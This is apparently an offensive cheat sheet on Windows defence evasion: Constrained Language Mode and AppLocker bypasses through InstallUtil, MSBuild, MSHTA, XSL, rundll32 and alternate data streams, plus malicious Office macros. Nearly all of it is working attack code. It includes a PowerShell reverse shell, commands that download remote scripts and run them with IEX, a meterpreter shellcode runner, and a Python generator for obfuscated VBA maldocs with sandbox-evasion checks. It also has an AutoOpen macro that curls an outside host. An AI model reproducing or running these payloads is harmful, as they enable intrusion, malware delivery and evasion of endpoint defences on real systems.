Bypass-Evasion Techniques

CLM Bypass

Detecting,
PS C:\Users\morph3\Desktop> $ExecutionContext.SessionState.LanguageMode
ConstrainedLanguage
Idea is very simple, we can abuse InstallUtil.exe like below and bypass CLM
using System;
using System.Management.Automation;
using System.Management.Automation.Runspaces;
using System.Configuration.Install;
namespace Bypass
{
class Program
{
static void Main(string[] args)
{
Console.WriteLine("Hello from main");
}
}
[System.ComponentModel.RunInstaller(true)]
public class Sample : Installer
{
public override void Uninstall(System.Collections.IDictionary savedState)
{
string rev = @"$client = New-Object System.Net.Sockets.TCPClient('192.168.255.255',4444);
$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);
try
{
$sendback = (iex $data 2>&1 | Out-String );
$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';
}
catch
{
$error[0].ToString() + $error[0].InvocationInfo.PositionMessage;
$sendback2 = ""ERROR: "" + $error[0].ToString() + ""`n`n"" + ""PS "" + (pwd).Path + '> ';
}
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);
$stream.Write($sendbyte,0,$sendbyte.Length);
$stream.Flush();
};
$client.Close();";
String cmd = "IEX(New-Object Net.WebClient).DownloadString('http://192.168.255.255/run.ps1') | powershell -noprofile";
Runspace rs = RunspaceFactory.CreateRunspace();
rs.Open();
PowerShell ps = PowerShell.Create();
ps.Runspace = rs;
ps.AddScript(cmd);
ps.Invoke();
rs.Close();
}
}
}
Build this csharp file above and execute it like below,
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /logfile= /LogToConsole=true /U .\my_clm_bypass.exe
Other alternatives,
CLM-Rout,
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\installutil.exe /uninstall /logfile= /LogToConsole=false /script="http://192.168.255.255/a.ps1" .\CLMRout.exe
PowerShDll,
Downgrade (this probably never works I guess),
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')
PSByPassCLM,
^ disable amsi bypass
#interactice
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /revshell=false /logfile= /LogToConsole=true /U .\psbypassclm.exe
#revshell
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /revshell=true /rhost=192.168.49.130 /rport=443 /logfile= /LogToConsole=true /U c:\windows\temp\PsBypassCLM.exe
Downgrading (this probably never works I guess),
powershell.exe -v 2 -ep bypass -command "IEX (New-Object Net.WebClient).DownloadString('http://ATTACKER_IP/rev.ps1')

Applocker Bypass

MSBuild

Generate a shellcode like below,
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.255.255 LPORT=9001 -f csharp -e x86/shikata_ga_nai -i 10 > out.cs
Replace the shellcode in the template and save it like something.csproj
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes shellcode. -->
<!-- C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe SimpleTasks.csproj -->
<!-- Save This File And Execute The Above Command -->
<!-- Author: Casey Smith, Twitter: @subTee -->
<!-- License: BSD 3-Clause -->
<Target Name="Hello">
<ClassExample />
</Target>
<UsingTask
TaskName="ClassExample"
TaskFactory="CodeTaskFactory"
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" >
<Task>
<Code Type="Class" Language="cs">
<![CDATA[
using System;
using System.Runtime.InteropServices;
using Microsoft.Build.Framework;
using Microsoft.Build.Utilities;
public class ClassExample : Task, ITask
{
private static UInt32 MEM_COMMIT = 0x1000;
private static UInt32 PAGE_EXECUTE_READWRITE = 0x40;
[DllImport("kernel32")]
private static extern UInt32 VirtualAlloc(UInt32 lpStartAddr,
UInt32 size, UInt32 flAllocationType, UInt32 flProtect);
[DllImport("kernel32")]
private static extern IntPtr CreateThread(
UInt32 lpThreadAttributes,
UInt32 dwStackSize,
UInt32 lpStartAddress,
IntPtr param,
UInt32 dwCreationFlags,
ref UInt32 lpThreadId
);
[DllImport("kernel32")]
private static extern UInt32 WaitForSingleObject(
IntPtr hHandle,
UInt32 dwMilliseconds
);
public override bool Execute()
{
byte[] shellcode = new byte[195] {
0xfc,0xe8,0x82,0x00,0x00,0x00,0x60,0x89,0xe5,0x31,0xc0,0x64,0x8b,0x50,0x30,
0x8b,0x52,0x0c,0x8b,0x52,0x14,0x8b,0x72,0x28,0x0f,0xb7,0x4a,0x26,0x31,0xff,
0xac,0x3c,0x61,0x7c,0x02,0x2c,0x20,0xc1,0xcf,0x0d,0x01,0xc7,0xe2,0xf2,0x52,
0x57,0x8b,0x52,0x10,0x8b,0x4a,0x3c,0x8b,0x4c,0x11,0x78,0xe3,0x48,0x01,0xd1,
0x51,0x8b,0x59,0x20,0x01,0xd3,0x8b,0x49,0x18,0xe3,0x3a,0x49,0x8b,0x34,0x8b,
0x01,0xd6,0x31,0xff,0xac,0xc1,0xcf,0x0d,0x01,0xc7,0x38,0xe0,0x75,0xf6,0x03,
0x7d,0xf8,0x3b,0x7d,0x24,0x75,0xe4,0x58,0x8b,0x58,0x24,0x01,0xd3,0x66,0x8b,
0x0c,0x4b,0x8b,0x58,0x1c,0x01,0xd3,0x8b,0x04,0x8b,0x01,0xd0,0x89,0x44,0x24,
0x24,0x5b,0x5b,0x61,0x59,0x5a,0x51,0xff,0xe0,0x5f,0x5f,0x5a,0x8b,0x12,0xeb,
0x8d,0x5d,0x6a,0x01,0x8d,0x85,0xb2,0x00,0x00,0x00,0x50,0x68,0x31,0x8b,0x6f,
0x87,0xff,0xd5,0xbb,0xe0,0x1d,0x2a,0x0a,0x68,0xa6,0x95,0xbd,0x9d,0xff,0xd5,
0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,0x13,0x72,0x6f,0x6a,
0x00,0x53,0xff,0xd5,0x63,0x61,0x6c,0x63,0x2e,0x65,0x78,0x65,0x20,0x63,0x00 };
UInt32 funcAddr = VirtualAlloc(0, (UInt32)shellcode.Length,
MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(shellcode, 0, (IntPtr)(funcAddr), shellcode.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
return true;
}
}
]]>
</Code>
</Task>
</UsingTask>
</Project>
Execute the payload
C:\windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe .\something.csproj

MSHTA

<html>
<head>
<script language="JScript">
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe /c calc.exe");
</script>
</head>
<body>
<script language="JScript">
self.close();
</script>
</body>
</html>
mshta http://192.168.255.255/test.hta

XSL

<?xml version='1.0'?>
<stylesheet version="1.0"
xmlns="http://www.w3.org/1999/XSL/Transform"
xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="http://mycompany.com/mynamespace">
<output method="text"/>
<ms:script implements-prefix="user" language="JScript">
<![CDATA[
var r = new ActiveXObject("WScript.Shell");
r.Run("cmd.exe");
]]>
</ms:script>
</stylesheet>
wmic process get brief /format:"http://192.168.255.255/a.xsl

DLL

test.cpp
#include <windows.h>
#include <stdlib.h>
extern "C" __declspec(dllexport) void pwn(void)
{
OutputDebugString("ExportedFunction");
system("whoami > a.txt");
}
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
{
switch (fdwReason)
{
case DLL_PROCESS_ATTACH:
OutputDebugString("DLL_PROCESS_ATTACH");
break;
case DLL_THREAD_ATTACH:
OutputDebugString("DLL_THREAD_ATTACH");
break;
case DLL_THREAD_DETACH:
OutputDebugString("DLL_THREAD_DETACH");
break;
case DLL_PROCESS_DETACH:
OutputDebugString("DLL_PROCESS_DETACH");
break;
}
return TRUE;
}
x86_64-w64-mingw32-gcc -shared -o test.dll test.cpp
C:\Windows\System32\rundll32.exe test.dll,pwn
C:\Windows\SysWOW64\rundll32.exe test.dll,pwn
rundll32 test.dll,pwn

ADS - Alternate Data Stream

foo.js
var shell = new ActiveXObject("WScript.Shell");
var res = shell.Run("cmd.exe");
C:\Users\morph3\desktop>type foo.js > test.exe
C:\Users\morph3\desktop>wscript test.exe:foo.js

Maldoc

Rot13 Encoding

It randomly select rot iteration
import random
ceaser_iter = random.randint(2,25)
payload = "curl 192.168.49.248/aa"
payload = "powershell -ep bypass -c \"curl 192.168.49.248/a|iex\""
print(f"[*] payload: {payload}")
print(f"[*] ceaser_iter: {ceaser_iter}")
def encrypt_ceaser(s):
"""
$payload = "winmgmts:"
[string]$output = ""
$payload.ToCharArray() | %{
[string]$thischar = [byte][char]$_ + 12
if($thischar.Length -eq 1)
{
$thischar = [string]"00" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 2)
{
$thischar = [string]"0" + $thischar
$output += $thischar
}
elseif($thischar.Length -eq 3)
{
$output += $thischar
}
}
$output
"""
enc_s = ""
for c in s:
itered_char = ord(c) + ceaser_iter
enc_s += str(itered_char).rjust(3,"0")
return enc_s
strings = ["Doc1.docm", payload, "winmgmts:", "Win32_Process"]
enc_strings = []
for s in strings:
enc_strings.append(encrypt_ceaser(s))
for i,j in zip(strings, enc_strings):
pass
#print(f"{i}:{j}")
tpl = f"""
Private Declare PtrSafe Function Sleep Lib "KERNEL32" (ByVal mili As Long) As Long
Sub Document_Open()
MyMacro
End Sub
Sub AutoOpen()
MyMacro
End Sub
Function Venus(Goats)
Venus = Chr(Goats - {ceaser_iter})
End Function
Function Mercury(Grapes)
Mercury = Left(Grapes, 3)
End Function
Function Gorgon(Topside)
Gorgon = Right(Topside, Len(Topside) - 3)
End Function
Function Mars(Jupiter)
Do
Shazam = Shazam + Venus(Mercury(Jupiter))
Jupiter = Gorgon(Jupiter)
Loop While Len(Jupiter) > 0
Mars = Shazam
End Function
Function MyMacro()
Dim Earth As String
Dim Neptune As String
Dim t1 As Date
Dim t2 As Date
Dim time As Long
t1 = Now()
Sleep (5000)
t2 = Now()
time = DateDiff("s", t1, t2)
If time < 4.5 Then
Exit Function
End If
If ActiveDocument.Name <> Mars("{enc_strings[0]}") Then
Exit Function
End If
Earth = "{enc_strings[1]}"
Neptune = Mars(Earth)
GetObject(Mars("{enc_strings[2]}")).Get(Mars("{enc_strings[3]}")).Create Neptune, Tea, Coffee, Napkin
End Function
"""
print(tpl)

URI to RCE (Follina)

Offensive VBA

Bypasses defender,

ShellExecuteA

Option Explicit
Private Declare Function ShellExecute Lib "shell32.dll" Alias "ShellExecuteA" ( _
ByVal hwnd As Long, _
ByVal lpOperation As String, _
ByVal lpFile As String, _
ByVal lpParameters As String, _
ByVal lpDirectory As String, _
ByVal lpShowCmd As Long) As Long
Sub AutoOpen()
Call ShellExecute(0, "Open", "cmd", "/c curl 192.168.49.248/xx", "", 1)
End Sub
Sub Document_Open()
Call ShellExecute(0, "Open", "cmd", "/c curl 192.168.49.248/xx", "", 1)
End Sub